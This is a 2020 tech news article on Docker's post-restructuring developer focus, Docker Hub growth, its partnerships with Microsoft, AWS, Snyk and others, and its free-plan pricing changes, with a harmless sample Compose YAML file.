That new mission would see Docker spending the next year with a "laser-like focus" on app development teams, embracing partners "in a first-class-citizen type way," and "building a sustainable community, sustainable code, and a sustainable company around the restructured entity."

The result? 11.3 million monthly active users sharing applications from 7.9 million images on Docker Hub repositories, with 13.6 billion pulls per month--up 70% over last year, Johnston said.

Johnston emphasized Docker's commitment to embracing a community to provide for the needs of enterprise developers. "We walk the talk," he said, citing the open sourcing of the Compose Specification in April on GitHub with open governance. Compose is a developer-focused standard for defining cloud and platform agnostic container-based applications.
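
For readers who haven't worked with it, a Compose file is a short YAML description of an application's services and their wiring. The example below is a generic sketch with placeholder image names, not anything from Docker's announcement:

```yaml
# compose.yaml -- a hypothetical three-service application
services:
  web:
    image: example/web:1.0        # placeholder image name
    ports:
      - "8080:80"                 # host:container port mapping
    depends_on:
      - api
  api:
    image: example/api:1.0        # placeholder image name
    environment:
      DB_HOST: db                 # service names double as hostnames
  db:
    image: postgres:13
    volumes:
      - db-data:/var/lib/postgresql/data
volumes:
  db-data:
```

The same file can drive a local `docker compose up` or, through the integrations discussed below, a deployment to a cloud container service, which is the platform-agnostic point of the specification.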

He pointed to some key partnerships, including a deal with Microsoft that integrates the Azure public cloud and the Visual Studio Code editor with Docker Desktop. The company also recently announced a partnership with open-source security platform provider Snyk to deliver a native vulnerability scanning service for container images. And he pointed to the recent agreement with Amazon Web Services (AWS) to create a simplified workflow for developers using Docker Compose to build apps for Amazon's Elastic Container Service (ECS) and Amazon ECS on AWS Fargate. Docker has also partnered with Atlassian and the Microsoft-owned GitHub to make Docker Hub something of a nexus for integrating, configuring, and managing application components.

Former industry analyst Donnie Berkholz, who joined the company as VP of product just a few weeks ago, was on hand for the briefing. All of these integrations are about helping developers get from code to cloud quickly, he said. "And that's not just about things we deliver, but these partnerships," he said. "Because developers are building, sharing, and deploying all over the internet. We can't just have a single point solution to solve their problems. We have to meet developers where they are and where they're going. And so really the partnership ecosystem that we're forming around Docker is the core to doing that."

Johnston also addressed some pricing changes that went into effect over the past year. The company added per-seat pricing for subscriptions, and then followed up with an annual purchasing option that offers discounts for longer-term commitments. The company's free plan, which gave developers unlimited public repositories and one private repository, proved not to be economically sustainable "when we have tens of millions of developers today and tens of millions more coming tomorrow," Johnston said. The adjustments are intended to make sure a small subset of "overconsuming" users doesn't negatively impact the rest of the users.

"In order to build a sustainable community and sustainable code, we have to build a sustainable company around the new restructured entity," he said. "So we put limits on the upper bounds of the all-you-can-eat buffet, so we're able to scale to tens of millions more developers and continue to offer free services, while still having a viable business that can sustain all the investments required in order to do that."

Posted by John K. Waters on October 29, 2020